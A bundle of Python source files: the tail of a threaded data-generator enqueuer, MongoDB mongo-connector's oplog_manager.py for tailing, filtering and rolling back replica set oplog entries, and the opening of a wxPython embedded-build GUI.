if self._use_multiprocessing is False:
while not self._stop_event.is_set():
with self.genlock:
try:
if (self.queue is not None and
self.queue.qsize() < self.max_queue_size):
# On all OSes, avoid **SYSTEMATIC** error
# in multithreading mode:
# `ValueError: generator already executing`
# => Serialize calls to
# infinite iterator/generator's next() function
generator_output = next(self._generator)
self.queue.put((True, generator_output))
else:
time.sleep(self.wait_time)
except StopIteration:
break
except Exception as e: # pylint: disable=broad-except
# Can't pickle tracebacks.
# As a compromise, print the traceback and pickle None instead.
if not hasattr(e, '__traceback__'):
setattr(e, '__traceback__', sys.exc_info()[2])
self.queue.put((False, e))
self._stop_event.set()
break
else:
while not self._stop_event.is_set():
try:
if (self.queue is not None and
self.queue.qsize() < self.max_queue_size):
generator_output = next(self._generator)
self.queue.put((True, generator_output))
else:
time.sleep(self.wait_time)
except StopIteration:
break
except Exception as e: # pylint: disable=broad-except
# Can't pickle tracebacks.
# As a compromise, print the traceback and pickle None instead.
traceback.print_exc()
setattr(e, '__traceback__', None)
self.queue.put((False, e))
self._stop_event.set()
break
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
Arguments:
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
try:
self.max_queue_size = max_queue_size
if self._use_multiprocessing:
self._manager = multiprocessing.Manager()
self.queue = self._manager.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
# On all OSes, avoid **SYSTEMATIC** error in multithreading mode:
# `ValueError: generator already executing`
# => Serialize calls to infinite iterator/generator's next() function
self.genlock = threading.Lock()
self.queue = queue.Queue(maxsize=max_queue_size)
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.seed)
thread = multiprocessing.Process(target=self._data_generator_task)
thread.daemon = True
if self.seed is not None:
self.seed += 1
else:
thread = threading.Thread(target=self._data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Arguments:
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if self._use_multiprocessing:
if thread.is_alive():
thread.terminate()
else:
# The thread.is_alive() test is subject to a race condition:
# the thread could terminate right after the test and before the
# join, rendering this test meaningless -> Call thread.join()
# always, which is ok no matter what the status of the thread.
thread.join(timeout)
if self._manager:
self._manager.shutdown()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
while self.is_running():
if not self.queue.empty():
success, value = self.queue.get()
# Rethrow any exceptions found in the queue
if not success:
six.reraise(value.__class__, value, value.__traceback__)
# Yield regular values
if value is not None:
yield value
else:
all_finished = all([not thread.is_alive() for thread in self._threads])
if all_finished and self.queue.empty():
raise StopIteration()
else:
time.sleep(self.wait_time)
# Make sure to rethrow the first exception in the queue, if any
while not self.queue.empty():
success, value = self.queue.get()
if not success:
six.reraise(value.__class__, value, value.__traceback__)
|
oplog_manager.py | # Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import sys
import time
import threading
import pymongo
from pymongo import CursorType, errors as pymongo_errors
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.gridfs_file import GridFSFile
from mongo_connector.util import log_fatal_exceptions, retry_until_ok
LOG = logging.getLogger(__name__)
class ReplicationLagLogger(threading.Thread):
"""Thread that periodically logs the current replication lag.
"""
def __init__(self, opman, interval):
super(ReplicationLagLogger, self).__init__()
self.opman = opman
self.interval = interval
self.daemon = True
def log_replication_lag(self):
checkpoint = self.opman.checkpoint
if checkpoint is None:
return
newest_write = retry_until_ok(self.opman.get_last_oplog_timestamp)
if newest_write < checkpoint:
# OplogThread will perform a rollback, don't log anything
return
lag_secs = newest_write.time - checkpoint.time
if lag_secs > 0:
LOG.info("OplogThread for replica set '%s' is %s seconds behind "
"the oplog.",
self.opman.replset_name, lag_secs)
else:
lag_inc = newest_write.inc - checkpoint.inc
if lag_inc > 0:
LOG.info("OplogThread for replica set '%s' is %s entries "
"behind the oplog.",
self.opman.replset_name, lag_inc)
else:
LOG.info("OplogThread for replica set '%s' is up to date "
"with the oplog.",
self.opman.replset_name)
def run(self):
while self.opman.is_alive():
self.log_replication_lag()
time.sleep(self.interval)
class OplogThread(threading.Thread):
"""Thread that tails an oplog.
Calls the appropriate method on DocManagers for each relevant oplog entry.
"""
def __init__(self, primary_client, doc_managers,
oplog_progress_dict, namespace_config,
mongos_client=None, **kwargs):
super(OplogThread, self).__init__()
self.batch_size = kwargs.get('batch_size', DEFAULT_BATCH_SIZE)
# The connection to the primary for this replicaSet.
self.primary_client = primary_client
# The connection to the mongos, if there is one.
self.mongos_client = mongos_client
# Are we allowed to perform a collection dump?
self.collection_dump = kwargs.get('collection_dump', True)
# The document manager for each target system.
# These are the same for all threads.
self.doc_managers = doc_managers
# Boolean describing whether or not the thread is running.
self.running = True
# Stores the timestamp of the last oplog entry read.
self.checkpoint = None
# A dictionary that stores OplogThread/timestamp pairs.
# Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
# The namespace configuration
self.namespace_config = namespace_config
# Whether the collection dump gracefully handles exceptions
self.continue_on_error = kwargs.get('continue_on_error', False)
LOG.info('OplogThread: Initializing oplog thread')
self.oplog = self.primary_client.local.oplog.rs
self.replset_name = (
self.primary_client.admin.command('ismaster')['setName'])
if not self.oplog.find_one():
err_msg = 'OplogThread: No oplog for thread:'
LOG.warning('%s %s' % (err_msg, self.primary_client))
def _should_skip_entry(self, entry):
"""Determine if this oplog entry should be skipped.
This has the possible side effect of modifying the entry's namespace
and filtering fields from updates and inserts.
"""
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
return True, False
# Ignore no-ops
if entry['op'] == 'n':
return True, False
ns = entry['ns']
if '.' not in ns:
return True, False
coll = ns.split('.', 1)[1]
# Ignore system collections
if coll.startswith("system."):
return True, False
# Ignore GridFS chunks
if coll.endswith('.chunks'):
return True, False
is_gridfs_file = False
if coll.endswith(".files"):
ns = ns[:-len(".files")]
if self.namespace_config.gridfs_namespace(ns):
is_gridfs_file = True
else:
return True, False
# Commands should not be ignored, filtered, or renamed. Renaming is
# handled by the DocManagers via the CommandHelper class.
if coll == "$cmd":
return False, False
# Rename or filter out namespaces that are ignored keeping
# included gridfs namespaces.
namespace = self.namespace_config.lookup(ns)
if namespace is None:
LOG.debug("OplogThread: Skipping oplog entry: "
"'%s' is not in the namespace configuration." % (ns,))
return True, False
# Update the namespace.
entry['ns'] = namespace.dest_name
# Take fields out of the oplog entry that shouldn't be replicated.
# This may nullify the document if there's nothing to do.
if not self.filter_oplog_entry(
entry, include_fields=namespace.include_fields,
exclude_fields=namespace.exclude_fields,
include_filter=namespace.include_filter):
return True, False
return False, is_gridfs_file
@log_fatal_exceptions
def run(self):
"""Start the oplog worker.
"""
ReplicationLagLogger(self, 30).start()
LOG.debug("OplogThread: Run thread started")
while self.running is True:
LOG.debug("OplogThread: Getting cursor")
cursor, cursor_empty = retry_until_ok(self.init_cursor)
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
continue
if cursor_empty:
LOG.debug("OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping.")
time.sleep(1)
continue
last_ts = None
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
LOG.debug("OplogThread: about to process new oplog entries")
while cursor.alive and self.running:
LOG.debug("OplogThread: Cursor is still"
" alive and thread is still running.")
for n, entry in enumerate(cursor):
# Break out if this thread should stop
if not self.running:
break
LOG.debug("OplogThread: Iterating through cursor,"
" document number in this cursor is %d"
% n)
skip, is_gridfs_file = self._should_skip_entry(entry)
if skip:
# update the last_ts on skipped entries to ensure
# our checkpoint does not fall off the oplog. This
# also prevents reprocessing skipped entries.
last_ts = entry['ts']
continue
# Sync the current oplog operation
operation = entry['op']
ns = entry['ns']
timestamp = util.bson_ts_to_long(entry['ts'])
for docman in self.doc_managers:
try:
LOG.debug("OplogThread: Operation for this "
"entry is %s" % str(operation))
# Remove
if operation == 'd':
docman.remove(
entry['o']['_id'], ns, timestamp)
remove_inc += 1
# Insert
elif operation == 'i': # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get('o')
# Extract timestamp and namespace
if is_gridfs_file:
db, coll = ns.split('.', 1)
gridfile = GridFSFile(
self.primary_client[db][coll],
doc)
docman.insert_file(
gridfile, ns, timestamp)
else:
docman.upsert(doc, ns, timestamp)
upsert_inc += 1
# Update
elif operation == 'u':
docman.update(entry['o2']['_id'],
entry['o'],
ns, timestamp)
update_inc += 1
# Command
elif operation == 'c':
# use unmapped namespace
doc = entry.get('o')
docman.handle_command(doc,
entry['ns'],
timestamp)
except errors.OperationFailed:
LOG.exception(
"Unable to process oplog document %r"
% entry)
except errors.ConnectionFailed:
LOG.exception(
"Connection failed while processing oplog "
"document %r" % entry)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
LOG.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far" % (
remove_inc, upsert_inc, update_inc))
LOG.debug("OplogThread: Doc is processed.")
last_ts = entry['ts']
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1:
self.update_checkpoint(last_ts)
last_ts = None
# update timestamp after running through oplog
if last_ts is not None:
LOG.debug("OplogThread: updating checkpoint after "
"processing new oplog entries")
self.update_checkpoint(last_ts)
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
LOG.exception(
"Cursor closed due to an exception. "
"Will attempt to reconnect.")
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
LOG.debug("OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread.")
self.update_checkpoint(last_ts)
LOG.debug("OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d"
% (remove_inc, upsert_inc, update_inc))
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
LOG.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
@classmethod
def _find_field(cls, field, doc):
"""Find the field in the document which matches the given field.
The field may be in dot notation, eg "a.b.c". Returns a list with
a single tuple (path, field_value) or the empty list if the field
is not present.
"""
path = field.split('.')
try:
for key in path:
doc = doc[key]
return [(path, doc)]
except (KeyError, TypeError):
return []
@classmethod
def _find_update_fields(cls, field, doc):
"""Find the fields in the update document which match the given field.
Both the field and the top level keys in the doc may be in dot
notation, eg "a.b.c". Returns a list of tuples (path, field_value) or
the empty list if the field is not present.
"""
def find_partial_matches():
for key in doc:
if len(key) > len(field):
# Handle case where field is a prefix of key, eg field is
# 'a' and key is 'a.b'.
if key.startswith(field) and key[len(field)] == '.':
yield [key], doc[key]
# Continue searching, there may be multiple matches.
# For example, field 'a' should match 'a.b' and 'a.c'.
elif len(key) < len(field):
# Handle case where key is a prefix of field, eg field is
# 'a.b' and key is 'a'.
if field.startswith(key) and field[len(key)] == '.':
# Search for the remaining part of the field
matched = cls._find_field(field[len(key) + 1:],
doc[key])
if matched:
# Add the top level key to the path.
match = matched[0]
match[0].insert(0, key)
yield match
# Stop searching, it's not possible for any other
# keys in the update doc to match this field.
return
try:
return [([field], doc[field])]
except KeyError:
# Field does not exactly match any key in the update doc.
return list(find_partial_matches())
def _pop_excluded_fields(self, doc, exclude_fields, update=False):
# Remove all the fields that were passed in exclude_fields.
find_fields = self._find_update_fields if update else self._find_field
for field in exclude_fields:
for path, _ in find_fields(field, doc):
# Delete each matching field in the original document.
temp_doc = doc
for p in path[:-1]:
temp_doc = temp_doc[p]
temp_doc.pop(path[-1])
return doc # Need this to be similar to copy_included_fields.
def _copy_included_fields(self, doc, include_fields, update=False):
new_doc = {}
find_fields = self._find_update_fields if update else self._find_field
for field in include_fields:
for path, value in find_fields(field, doc):
# Copy each matching field in the original document.
temp_doc = new_doc
for p in path[:-1]:
temp_doc = temp_doc.setdefault(p, {})
temp_doc[path[-1]] = value
return new_doc
def _apply_include_filter(self, doc, include_fields, update=False):
find_fields = self._find_update_fields if update else self._find_field
for field in include_fields:
for path, value in find_fields(field, doc):
# if field exists but has the wrong value, return false so the doc will be dropped
if value != include_fields[field]:
return False
# did not find any field with a wrong value, returning true so the doc will be passed
return True
def filter_oplog_entry(self, entry, include_fields=None,
exclude_fields=None,
include_filter=None):
"""Remove fields from an oplog entry that should not be replicated.
NOTE: this does not support array indexing, for example 'a.b.2'"""
if not include_fields and not exclude_fields:
return entry
elif include_fields:
filter_fields = self._copy_included_fields
else:
filter_fields = self._pop_excluded_fields
fields = include_fields or exclude_fields
entry_o = entry['o']
if include_filter is not None:
should_continue = self._apply_include_filter(entry_o, include_filter)
if not should_continue:
return None
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry['op'] == 'i':
entry['o'] = filter_fields(entry_o, fields)
# 'u' indicates an update. The 'o' field describes an update spec
# if '$set' or '$unset' are present.
elif entry['op'] == 'u' and ('$set' in entry_o or '$unset' in entry_o):
if '$set' in entry_o:
entry['o']["$set"] = filter_fields(
entry_o["$set"], fields, update=True)
if '$unset' in entry_o:
entry['o']["$unset"] = filter_fields(
entry_o["$unset"], fields, update=True)
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry_o and not entry_o['$set']:
entry_o.pop("$set")
if "$unset" in entry_o and not entry_o['$unset']:
entry_o.pop("$unset")
if not entry_o:
return None
# 'u' indicates an update. The 'o' field is the replacement document
# if no '$set' or '$unset' are present.
elif entry['op'] == 'u':
entry['o'] = filter_fields(entry_o, fields)
return entry
def get_oplog_cursor(self, timestamp=None):
"""Get a cursor to the oplog after the given timestamp, excluding
no-op entries.
If no timestamp is specified, returns a cursor to the entire oplog.
"""
query = {'op': {'$ne': 'n'}}
if timestamp is None:
cursor = self.oplog.find(
query,
cursor_type=CursorType.TAILABLE_AWAIT)
else:
query['ts'] = {'$gte': timestamp}
cursor = self.oplog.find(
query,
cursor_type=CursorType.TAILABLE_AWAIT,
oplog_replay=True)
return cursor
def get_collection(self, namespace):
"""Get a pymongo collection from a namespace."""
database, coll = namespace.split('.', 1)
return self.primary_client[database][coll]
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
# Flag if this oplog thread was cancelled during the collection dump.
# Use a list to workaround python scoping.
dump_cancelled = [False]
def get_all_ns():
ns_set = []
gridfs_ns_set = []
db_list = self.namespace_config.get_included_databases()
if not db_list:
# Only use listDatabases when the configured databases are not
# explicit.
db_list = retry_until_ok(self.primary_client.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.primary_client[database].collection_names)
for coll in coll_list:
# ignore system collections
if coll.startswith("system."):
continue
# ignore gridfs chunks collections
if coll.endswith(".chunks"):
continue
if coll.endswith(".files"):
namespace = "%s.%s" % (database, coll)
namespace = namespace[:-len(".files")]
if self.namespace_config.gridfs_namespace(namespace):
gridfs_ns_set.append(namespace)
else:
namespace = "%s.%s" % (database, coll)
if self.namespace_config.map_namespace(namespace):
ns_set.append(namespace)
return ns_set, gridfs_ns_set
dump_set, gridfs_dump_set = get_all_ns()
LOG.debug("OplogThread: Dumping set of collections %s " % dump_set)
def docs_to_dump(from_coll, namespace=None):
last_id = None
attempts = 0
projection = self.namespace_config.projection(from_coll.full_name)
namespaceconfig = None
if namespace is not None:
namespaceconfig = self.namespace_config.lookup(namespace)
# Loop to handle possible AutoReconnect
while attempts < 60:
if last_id is None:
cursor = retry_until_ok(
from_coll.find,
projection=projection,
sort=[("_id", pymongo.ASCENDING)]
)
else:
cursor = retry_until_ok(
from_coll.find,
{"_id": {"$gt": last_id}},
projection=projection,
sort=[("_id", pymongo.ASCENDING)]
)
try:
for doc in cursor:
if not self.running:
# Thread was joined while performing the
# collection dump.
dump_cancelled[0] = True
raise StopIteration
if namespaceconfig is not None and namespaceconfig.include_filter is not None:
should_continue = self._apply_include_filter(doc, namespaceconfig.include_filter)
if not should_continue:
continue
last_id = doc["_id"]
yield doc
break
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure):
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_failed = 0
for namespace in dump_set:
from_coll = self.get_collection(namespace)
mapped_ns = self.namespace_config.map_namespace(namespace)
total_docs = retry_until_ok(from_coll.count)
num = None
for num, doc in enumerate(docs_to_dump(from_coll, namespace)):
try:
dm.upsert(doc, mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception(
"Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
if num % 10000 == 0:
LOG.info("Upserted %d out of approximately %d docs "
"from collection '%s'",
num + 1, total_docs, namespace)
if num is not None:
LOG.info("Upserted %d out of approximately %d docs from "
"collection '%s'",
num + 1, total_docs, namespace)
if num_failed > 0:
LOG.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
for namespace in dump_set:
from_coll = self.get_collection(namespace)
total_docs = retry_until_ok(from_coll.count)
mapped_ns = self.namespace_config.map_namespace(
namespace)
LOG.info("[%s] Bulk upserting approximately %d docs from "
"collection '%s'",
self.replset_name, total_docs, namespace)
dm.bulk_upsert(docs_to_dump(from_coll, namespace),
mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception("OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially")
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
LOG.debug("OplogThread: Using bulk upsert function for "
"collection dump")
upsert_all(dm)
if gridfs_dump_set:
LOG.info("OplogThread: dumping GridFS collections: %s",
gridfs_dump_set)
# Dump GridFS files
for gridfs_ns in gridfs_dump_set:
mongo_coll = self.get_collection(gridfs_ns)
from_coll = self.get_collection(gridfs_ns + '.files')
dest_ns = self.namespace_config.map_namespace(gridfs_ns)
for doc in docs_to_dump(from_coll, gridfs_ns):
gridfile = GridFSFile(mongo_coll, doc)
dm.insert_file(gridfile, dest_ns, long_ts)
LOG.info("OplogThread [%s]: collection dump completed", self.replset_name)
except:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
LOG.critical('Exception during collection dump',
exc_info=errors.get_nowait())
dump_success = False
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
return None
if dump_cancelled[0]:
LOG.warning('Initial collection dump was interrupted. '
'Will re-run the collection dump on next startup.')
return None
return timestamp
def _get_oplog_timestamp(self, newest_entry):
"""Return the timestamp of the latest or earliest entry in the oplog.
"""
sort_order = pymongo.DESCENDING if newest_entry else pymongo.ASCENDING
curr = self.oplog.find({'op': {'$ne': 'n'}}).sort(
'$natural', sort_order
).limit(-1)
try:
ts = next(curr)['ts']
except StopIteration:
LOG.debug("OplogThread: oplog is empty.")
return None
LOG.debug("OplogThread: %s oplog entry has timestamp %s."
% ('Newest' if newest_entry else 'Oldest', ts))
return ts
def get_oldest_oplog_timestamp(self):
"""Return the timestamp of the oldest entry in the oplog.
"""
return self._get_oplog_timestamp(False)
def get_last_oplog_timestamp(self):
"""Return the timestamp of the newest entry in the oplog.
"""
return self._get_oplog_timestamp(True)
def _cursor_empty(self, cursor):
try:
# Tailable cursors can not have singleBatch=True in MongoDB > 3.3
next(cursor.clone().remove_option(CursorType.TAILABLE_AWAIT)
.limit(-1))
return False
except StopIteration:
return True
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
Returns the cursor and True if the cursor is empty.
"""
timestamp = self.read_last_checkpoint()
if timestamp is None:
if self.collection_dump:
# dump collection and update checkpoint
timestamp = self.dump_collection()
self.update_checkpoint(timestamp)
if timestamp is None:
return None, True
else:
# Collection dump disabled:
# Return cursor to beginning of oplog but do not set the
# checkpoint. The checkpoint will be set after an operation
# has been applied.
cursor = self.get_oplog_cursor()
return cursor, self._cursor_empty(cursor)
cursor = self.get_oplog_cursor(timestamp)
cursor_empty = self._cursor_empty(cursor)
if cursor_empty:
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor")
self.update_checkpoint(self.rollback())
return self.init_cursor()
first_oplog_entry = next(cursor)
oldest_ts_long = util.bson_ts_to_long(
self.get_oldest_oplog_timestamp())
checkpoint_ts_long = util.bson_ts_to_long(timestamp)
if checkpoint_ts_long < oldest_ts_long:
# We've fallen behind, the checkpoint has fallen off the oplog
return None, True
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry["ts"])
if cursor_ts_long > checkpoint_ts_long:
# The checkpoint is not present in this oplog and the oplog
# did not rollover. This means that we connected to a new
# primary which did not replicate the checkpoint and which has
# new changes in its oplog for us to process.
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor: new oplog entries found but "
"checkpoint is not present")
self.update_checkpoint(self.rollback())
return self.init_cursor()
# first entry has been consumed
return cursor, cursor_empty
def update_checkpoint(self, checkpoint):
"""Store the current checkpoint in the oplog progress dictionary.
"""
if checkpoint is not None and checkpoint != self.checkpoint:
self.checkpoint = checkpoint
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
# If we have the repr of our oplog collection
# in the dictionary, remove it and replace it
# with our replica set name.
# This allows an easy upgrade path from mongo-connector 2.3.
# For an explanation of the format change, see the comment in
# read_last_checkpoint.
oplog_dict.pop(str(self.oplog), None)
oplog_dict[self.replset_name] = checkpoint
LOG.debug("OplogThread: oplog checkpoint updated to %s",
checkpoint)
else:
LOG.debug("OplogThread: no checkpoint to update.")
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
# In versions of mongo-connector 2.3 and before,
# we used the repr of the
# oplog collection as keys in the oplog_progress dictionary.
# In versions thereafter, we use the replica set name. For backwards
# compatibility, we check for both.
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
try:
# New format.
ret_val = oplog_dict[self.replset_name]
except KeyError:
try:
# Old format.
ret_val = oplog_dict[oplog_str]
except KeyError:
pass
LOG.debug("OplogThread: reading last checkpoint as %s " %
str(ret_val))
self.checkpoint = ret_val
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
LOG.debug("OplogThread: Initiating rollback sequence to bring "
"system into a consistent state.")
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(last_docs,
key=lambda x: x["_ts"] if x else float("-inf"))
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc['_ts'])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{'ts': {'$lte': target_ts}, 'op': {'$ne': 'n'}},
sort=[('$natural', pymongo.DESCENDING)]
)
LOG.debug("OplogThread: last oplog entry is %s"
% str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry['ts']
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc['_ts']
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc['ns'] in rollback_set:
rollback_set[doc['ns']].append(doc)
else:
rollback_set[doc['ns']] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = self.namespace_config.unmap_namespace(
namespace)
if not original_namespace:
original_namespace = namespace
database, coll = original_namespace.split('.', 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc['_id']) for doc in doc_list]
# Use connection to whole cluster if in sharded environment.
client = self.mongos_client or self.primary_client
to_update = util.retry_until_ok(
client[database][coll].find,
{'_id': {'$in': bson_obj_id_list}},
projection=self.namespace_config.projection(
original_namespace)
)
# Doc list are docs in target system, to_update are
# Docs in mongo
doc_hash = {} # Hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc['_id'])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc['_id'] in doc_hash:
del doc_hash[doc['_id']]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
# Delete the inconsistent documents
LOG.debug("OplogThread: Rollback, removing inconsistent "
"docs.")
remov_inc = 0
for document_id in doc_hash:
try:
dm.remove(document_id, namespace,
util.bson_ts_to_long(rollback_cutoff_ts))
remov_inc += 1
LOG.debug(
"OplogThread: Rollback, removed %r " % doc)
except errors.OperationFailed:
LOG.warning(
"Could not delete document during rollback: %r "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % doc
)
LOG.debug("OplogThread: Rollback, removed %d docs." %
remov_inc)
# Insert the ones from mongo
LOG.debug("OplogThread: Rollback, inserting documents "
"from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
try:
insert_inc += 1
dm.upsert(doc,
namespace,
util.bson_ts_to_long(rollback_cutoff_ts))
except errors.OperationFailed:
fail_insert_inc += 1
LOG.exception("OplogThread: Rollback, Unable to "
"insert %r" % doc)
LOG.debug("OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts)))
return rollback_cutoff_ts
|
bspLinuxCoCoox.py | #!/usr/bin/python
import wx
import os
import time
import re
import sys, os
import os.path
import subprocess
import datetime
import xml.etree.ElementTree as ET
import threading
from threading import Thread
import wx.lib.newevent
VERSION="1.0"
ID_BUTTON=100
ID_LOAD=101
ID_RELOAD=102
ID_UNLOAD=103
ID_TOOLCHAIN=104
ID_EXIT=100
ID_BUILD=200
ID_REBUILD=201
ID_CANCELBUILD=202
ID_BUILDSCRIPT=203
ID_CONFIGURE=300
ID_TOOLCHAIN=301
ID_ABOUT=400
ID_SPLITTER=500
UpgradeLog, EVT_BUILD_UPGRADE_LOG = wx.lib.newevent.NewEvent()
EndBuild, EVT_END_BUILD_DONE = wx.lib.newevent.NewEvent()
tcp=""
tcn=""
sp=""
def drawALine():
return "__________________________________________________________________________________________________________________"
def set_toolChainPath(val):
global tcp
tcp=val
print "[settings]toolChainPath="+tcp
def toolChainPath():
return tcp
def set_toolChainPrefix(val):
global tcn
tcn=val
print "[settings]toolChainPrefix="+tcn
def toolChainPrefix():
return tcn
def set_startpath(val):
global sp
sp=val
print "[settings]startpath="+sp
def startpath():
return sp
def readPref():
if os.path.isfile('bspLinuxCoCoox.pref') == False:
print '[settings]no default path'
set_toolChainPath("")
set_toolChainPrefix("")
set_startpath("")
savePref()
return
f = open('bspLinuxCoCoox.pref', 'r')
llist=f.readlines()
for el in llist:
if el.find("toolChainPath=")==0:
set_toolChainPath(el[len("toolChainPath="):-1])
elif el.find("toolChainPrefix=")==0:
set_toolChainPrefix(el[len("toolChainPrefix="):-1])
elif el.find("startpath=")==0:
set_startpath(el[len("startpath="):-1])
f.close()
def savePref():
f = open('bspLinuxCoCoox.pref', 'w')
f.write("toolChainPath="+toolChainPath()+"\n")
f.write("toolChainPrefix="+toolChainPrefix()+"\n")
f.write("startpath="+startpath()+"\n")
f.close()
readPref()
#projectDef is a list of string with
#[ [name1,outdir1,[define options]1,isLibrary1,outputName1,compile option1,link option1, [before build]1,[after build]1],..., [nameN,outdirN,[define options]N,isLibrary1N,outputNameN,compile optionN,link optionN, [before build]N,[after build]N]]
class MyPjMgrCtrl(wx.ListCtrl):
def __init__(self, parent, id):
self.parent=parent
wx.ListCtrl.__init__(self, parent, id, style=wx.LC_REPORT)
self.InsertColumn(0, 'Project')
self.SetColumnWidth(0, 600)
